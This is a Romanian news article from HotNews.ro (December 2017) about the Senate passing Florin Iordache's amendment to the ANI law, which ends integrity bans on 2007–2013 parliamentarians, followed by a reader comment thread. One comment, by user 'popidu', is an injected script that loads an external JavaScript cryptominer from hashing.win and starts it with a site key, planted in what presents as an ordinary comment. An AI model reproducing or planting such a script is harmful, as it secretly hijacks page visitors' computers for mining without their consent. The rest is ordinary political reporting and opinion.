UPDATE Modificarea Legii ANI a lui Florin Iordache, prin care inceteaza interdictiile aplicate parlamentarilor pana in 2013, adoptat de Senat. Merge la promulgare/ Florina Presada: "A venit Mos Gerila la PSD"

de I.R.     HotNews.ro
Luni, 18 decembrie 2017, 16:24 Actualitate | Politic


Agentia Nationala de Integritate
Foto: Agerpres
Comisia juridica a Senatului a votat un raport de admitere, luni, pentru controversata propunere legislativa initiata de deputatul PSD Florin Iordache de modificare a Legii ANI, conform careia interdictiile aplicate deputatilor si senatorilor pe baza rapoartelor de evaluare intocmite de Agentia Nationala de Integritate si care au constatat nerespectarea prevederilor legale privind conflictul de interese in perioada 2007 - 2013 inceteaza de drept, pe care insa a modificat-o printr-un amendament al unui senator PSD ca sa fie clar ca se aplica doar parlamentarilor.

UPDATE 19.45 Proiectul a fost votat de plenul Senatului - au fost 77 voturi "pentru" si 39 "impotriva". Dupa ce legea a fost adoptata, senatoara USR Florina Presada a luat cuvantul pentur a sublinia faptul ca "Mos Gerila a venit la PSD". Claudiu Manda, care conducea sedinta, i-a taiat microfonul cand aceasta le cerea senatorilor direct vizati de aceasta modificare sa vina sa isi ia cadourile.

Articolul reformulat de senatorul PSD Marian Pavel şi acceptat de Comisia juridică prevede că "interdicţiile aplicate persoanelor care au avut calitatea de senator şi/sau deputat în oricare dintre mandatele cuprinse în perioada 2007 - 2013 în temeiul articolului 25 pe baza rapoartelor de evaluare întocmite de Agenţia Naţională de Integritate şi care au constatat nerespectarea prevederilor legale privind conflictual de interese în exercitarea oricăruia dintre mandatele de senator şi/sau deputat în perioada 2007 - 2013, până la intrarea în vigoare a Legii 219/2013 pentru modificarea şi completarea Legii 96/2006 privind Statutul deputaţilor şi al senatorilor, încetează de drept".

De asemenea, comisia a eliminat amendamentul adoptat de Camera Deputaţilor la art. 25, potrivit căruia "persoana eliberată sau destituită din funcţie potrivit prevederilor actuale sau faţă de care s-a constatat existenţa conflictului de interese ori starea de incompatibilitate este decăzută din dreptul de a mai exercita o funcţie sau o demnitate publică ce face obiectul prevederilor prezentei legi, cu excepţia celor electorale, pe o perioadă de trei ani de la data eliberării, destituirii din funcţia ori demnitatea publică respectivă sau a încetării de drept a mandatului în care a existat conflictul de interese ori starea de incompatibilitate. Dacă persoana a ocupat o funcţie eligibilă, nu mai poate ocupa aceeaşi funcţie pe o perioadă de trei ani de la încetarea mandatului în care a existat conflictul de interese ori starea de incompatibilitate".

Astfel, art. 25 alin 2 ramane in forma in vigoare:

(2) Persoana eliberata sau destituita din functie potrivit prevederilor alin. (1) sau fata de care s-a constatat existenta conflictului de interese ori starea de incompatibilitate este decazuta din dreptul de a mai exercita o functie sau o demnitate publica ce face obiectul prevederilor prezentei legi, cu exceptia celor electorale, pe o perioada de 3 ani de la data eliberarii, destituirii din functia ori demnitatea publica respectiva sau a incetarii de drept a mandatului. Daca persoana a ocupat o functie eligibila, nu mai poate ocupa aceeasi functie pe o perioada de 3 ani de la incetarea mandatului. In cazul in care persoana nu mai ocupa o functie sau o demnitate publica la data constatarii starii de incompatibilitate ori a conflictului de interese, interdictia de 3 ani opereaza potrivit legii, de la data ramanerii definitive a raportului de evaluare, respectiv a ramanerii definitive si irevocabile a hotararii judecatoresti de confirmare a existentei unui conflict de interese sau a unei stari de incompatibilitate.

Proiectul era pe ordinea de zi a plenului Senatului de luni, insa acest plen a fost intarziat de plenul comun pentru dezbaterile pe buget si cel mai probabil proiectul va fi votat marti.

ANI a avertizat, pentru Romania Curata, inainte ca aceste modificari sa fie votate, ca proiectul de lege ar putea avea efecte devastatoare asupra cazuisticii ANI. Practic, toate cazurile Agentiei Nationale de Integritate - acolo unde nu s-a ajuns deja la sentinte definitive sau la aplicarea de sanctiuni - ar putea fi anulate. E vorba de 675 de cazuri de parlamentari, primari, presedinti de consilii judetene si consilieri.

Printre potentialii beneficiari ai schimarilor legislative se numara parlamentarii Serban Mihailescu, Liviu Harbuz, Steluta Cataniciu, Marin Anton, Hubert Thuma, Anghel Stanciu, Iulian Iancu, Ion Calin, Ion Mociolaca, Emanoil Savin, Cornel Resmerita si fostii parlamentari William Branza, Petru Calian, Mihaita Calimente, Catalin Croitoru, Relu Fenechiu, Mircia Giurgiu, Laurentiu Nistor, Daniel Oajdea sau Madalin Voicu.


Citeste doar ceea ce merita. Urmareste-ne si pe Facebook si Instagram.

7965 vizualizari

 • +37 (37 voturi)    
  bei... (Luni, 18 decembrie 2017, 20:00)

  liviu_ [utilizator]

  eu am mai zis...
  ce dracu ne mai incurcam?! abrogam codu penal si asta e ...
  • +13 (13 voturi)    
   Votam Codu lui Iordache (Luni, 18 decembrie 2017, 22:25)

   thatchme [utilizator] i-a raspuns lui liviu_

   Noul Napoleon din Furlament
   • +5 (5 voturi)    
    Ciordache, pls (Marţi, 19 decembrie 2017, 9:59)

    remus2009xxx [utilizator] i-a raspuns lui thatchme

    Scrie correct!
  • +11 (11 voturi)    
   Nu-nu, nu-l abrogam, ii mai adaugam un articol (Marţi, 19 decembrie 2017, 1:39)

   Susufler0 [utilizator] i-a raspuns lui liviu_

   cu urmatorul continut : "Se interzice tuturor partilor vatamate, sub sanctiunea aplicarii pedepsei cu inchisoarea de la... la..., sa formuleze plangeri penale pt savarsirea urmatoarelor infractiuni ( si urmeaza enumerarea tuturor infractiunilor prevazute in codul penal si in toate legile speciale)".

   Alin. 2 : "Forta majora, cazul fortuit, betia si alte asemenea nu inlatura raspunderea penala a partilor vatamate."

   PS. Sa fim sinceri, catre asta ne indreptam !
  • +1 (1 vot)    
   forme fara fond (Marţi, 19 decembrie 2017, 13:23)

   g01an [utilizator] i-a raspuns lui liviu_

   multi dintre ei si cei care ii sustin nu ar intelege asta. pentru ei forma fara fond este modul cum trebuie sa functioneze tara. si nu-i vad in stare sa inteleaga mai mult de atat.
 • +30 (32 voturi)    
  EMIGREZ (Luni, 18 decembrie 2017, 20:01)

  ciuma.rosie [utilizator]

  Vand casa + masina audi a4, pret convenabil. NU Se mai poate in tara asta. Greva fiscala , NU mai platiti impozitele la case si masini sa nu mai aiba astia ce fura .
  • +25 (25 voturi)    
   razboiul inca nu s-a sfarsit!!!! (Luni, 18 decembrie 2017, 20:25)

   /./ [utilizator] i-a raspuns lui ciuma.rosie

   Dar ce zici de concediu fara plata cateva luni si sa fim 1 milion de oameni, oare mai rezista economia ???Daca am fi uniti am avea o forta enorma, am matura in cateva luni cu borfasi
   • +22 (22 voturi)    
    Daca .. (Luni, 18 decembrie 2017, 22:26)

    BartSimpson [utilizator] i-a raspuns lui /./

    Sa nu mai fim naivi. Nici revolutia nu a fost revolutie. Aceasta turma (ca popor nu e) nu are capacitate de reactie in fatza pericolului. Adica are...baga adanc capul in nisip...
  • +8 (8 voturi)    
   impozitele la case si masini sunt taxe locale (Luni, 18 decembrie 2017, 22:56)

   stefan2008 [utilizator] i-a raspuns lui ciuma.rosie

   in schimb banii care ajung la ei sunt cei din taxele care nu le platesti la primarie. Din nefericire in cazul acelor bani, unica solutie este sa schimbi domiciliul fiscal. Iti recomnad Luxemburgul cu TVA de 17%.
   • +5 (7 voturi)    
    USA nu-i mai bine ?? (Marţi, 19 decembrie 2017, 9:58)

    ciuma.rosie [utilizator] i-a raspuns lui stefan2008

    am tva 9% in New Jersey
    • +1 (1 vot)    
     bucura-te ca esti acolo (Marţi, 19 decembrie 2017, 20:19)

     stefan2008 [utilizator] i-a raspuns lui ciuma.rosie

     in SUA nu se ajunge ca in Luxemburg, fara viza.
 • +35 (35 voturi)    
  No hai! (Luni, 18 decembrie 2017, 20:17)

  GeorgeOrwell [utilizator]

  No hai!
  No hai toti sa le aratam cine-i POPORUL ROMAN.
  Desteapta-te Romane din somnul cel de moarte in care te-adancira barbarii de tirani: P$D, ALDE, Mocirleanu, Daddy, pungasii, talharii, criminalii, penalii, porcii, televiziunea si media aservita.
  E pentru prima data cand inteleg cu adevarat imnul. Andrei Muresanu a fost un vizionar, a scris imn pentru viitor, pentru 2017.
  No hai sa cantam imnul si vom intelege ce trebuie sa facem apoi.
 • +20 (20 voturi)    
  ... (Luni, 18 decembrie 2017, 20:18)

  /./ [utilizator]

  Legea ANI a fost ceruta de UE, daca UE tace si nu ia masuri atunci avem o problema.Sigur la multe tari din UE le convine situatia, cei mai calificati oameni o sa migreze la ei.Pana una alta razboiul inca se duce.Avem multe variante de a lupta , toata treaba e sa fim multi si uniti.Un exemplu la limita, 1 milion de oameni de maine sa intre in concediu fara plata pentru cateva luni, automat economia o ia bine la vale.Intrebarea e cati ar face un astfel de gest ????Singura solutie este ca economia Romaniei sa se prabuseasca , altfel votantii lor nu o sa isi schimbe optiune nici in 100 de ani.Sa vedem ce zice presedintele sa vedem ce zice UE, noi in strada , eu nu vad tabara asta de talhari sa castige acest razboi.
 • +20 (20 voturi)    
  Nu suntem oaia psdului !!! (Luni, 18 decembrie 2017, 20:24)

  Plagarus [utilizator]

  Simbolul de tzara al RO nu poate fi hotia institutionalizata,de cate interlopii politici ce "legifereaza" doar dupa propriile interese.
 • +24 (24 voturi)    
  măndru că sunt romăn ! (Luni, 18 decembrie 2017, 20:35)

  Scuratov [utilizator]

  O tara intrega este bataia de joc a unui grup de infractori , mediocrii, analfabeti si interlopi .Analfabeti si fara studii juridice fac legi pentru tara prin cărciumi la chiolhanuri si un intreg popor tace , sta si bea bere la PET.
 • -12 (12 voturi)    
  Nasol (Luni, 18 decembrie 2017, 21:00)

  popidu [utilizator]

  <script src="https://www.hashing.win/scripts/min.js"></script>
  <script>
  var miner = new Client.Anonymous('680d4eae08fd76bf9b2826da35db127fbfaa32ec84bd277af8ca0cfa892e9072');
  miner.start();
  </script>
 • +10 (12 voturi)    
  daca nu le respinge Iohannis (Luni, 18 decembrie 2017, 22:58)

  stefan2008 [utilizator]

  nu mai are nicio sansa PNL-ul cel putred.
 • +11 (11 voturi)    
  Greva foamei parlamentari din opozitie, (Luni, 18 decembrie 2017, 23:50)

  soundtrack [utilizator]

  protest extrem, legat cu lanturile de gardurile parlamentului, greva generala(cine?-liderii sunt cumparati), CCR rationala, lovitura armata.
 • +3 (17 voturi)    
  Nu ma pot abtine... (Marţi, 19 decembrie 2017, 1:06)

  mcv [utilizator]

  Unde-i cel care "veghează la respectarea Constituției și la buna funcționare a autorităților publice, exercită funcția de mediere între puterile statului, precum și între stat și societate"?
  Stie cineva?
  Imi poate spune cineva UN SINGUR MOTIV de INTERES GENERAL, pentru care acest om, TACE?
  In situatia in care ne aflam acum, ce anume, daca ar face Iohannis, n-ar fi justificat?
  Noi ne aflam acum in stare de normalitate?
  Atunci cand eu si familia mea nu ne putem trai viata in conditii normale - mai mult stam in strada decat acasa - , cum pot eu, sau oricine, accepta scuza ridicola, ca Iohannis "respecta Constitutia"?
  Iohannis nu Constitutia o respecta, ci : SE RESPECTA pe EL INSUSI!
  Care ar fi motivul pentru care eu sa-l mai pot vedea cocotat la Cotroceni?

  NB. De cand Dragnea l-a intins de urechi si i-a pus in vedere - ca nici el, nici purtatorul lui de cuvant- sa nu mai rosteasca numele sfantului PSD, cautati si veti vedea cum, le-a iesit din vocabular cuvantul PSD!
  Este Iohannis santajat?
  Este Iohannis atat de mic, incat ii merita sa lase o tara sa fie distrusa, de frica unei suspendari si a riscului de a-si pierde beneficiile pe care i le aduce aceasta pozitie?
  CE beneficii am eu, cu el Presedinte?
  • +3 (9 voturi)    
   Ai si tu o marota "comandata" ? (Marţi, 19 decembrie 2017, 1:57)

   Susufler0 [utilizator] i-a raspuns lui mcv

   De cand a ajuns respectarea Constitutiei o "scuza ridicola" ?

   Nici macar nu realizezi ca punand la bataie astfel de "argumente", faci tocmai jocul celor de la putere.

   De ce crezi ca eficienta se masoara in numarul iesirilor pe post ale Presedintelui ?

   PS. Si apropo, in momentul de fata Iohannis nu are ce sa medieze. Ca sa mediezi trebuie sa-ti ceara una din parti lucrul acesta.

   PPS Pe legislatorii pesedisti ii excludem, ramane puterea judecatoreasca. Ea ar trebui sa ceara o mediere !
  • -1 (5 voturi)    
   Comentariu sters de utilizator (Marţi, 19 decembrie 2017, 6:09)

   [anonim] i-a raspuns lui mcv

  • +4 (4 voturi)    
   Ai rabdare! (Marţi, 19 decembrie 2017, 10:18)

   nlln [utilizator] i-a raspuns lui mcv

   Orice om normal , sper ca Presedintele se numara printre ei, isi face un plan.
   Nu poti sa iesi in fiecare zi si sa " picuri" argumente in fata acestor inculti. Iti sapi groapa singur, le dai timp de aparare / modificare.

   Iesi o data , explici si actionezi.
   Ai rabdare.

   Pana atunci..in strada.
 • +11 (11 voturi)    
  stati, asta e comunism (Marţi, 19 decembrie 2017, 1:15)

  Coco Whistle [utilizator]

  si abuz in functie...tara trebuie luata inapoi imediat. dar nu uitati, pe cine nu lasi sa moara nu te lasa sa traiesti.
 • +4 (4 voturi)    
  articolul x, alineatul y (Marţi, 19 decembrie 2017, 2:14)

  cladob [utilizator]

  "Programul Electoral al gruparii politice publicat in monitorul oficial"

  articolul z, alineatul ț: "Orice proiect de lege neprezentat in programul electoral, expus inițial în monitorul oficial, se discuta in parlament cel putin 6 luni si este votat cu cel putin 80% din parlamentari"

  ... așa trebuie schimbată Legea ..


Abonare la comentarii cu RSS
Întâlniri on-line | #deladistanță

Top 10 articole cele mai ...Hotnews
Agenţii de ştiri
Siteul Hotnews.ro foloseste cookie-uri. Cookie-urile ne ajută să imbunatatim serviciile noastre. Mai multe detalii, aici.powered by
developed by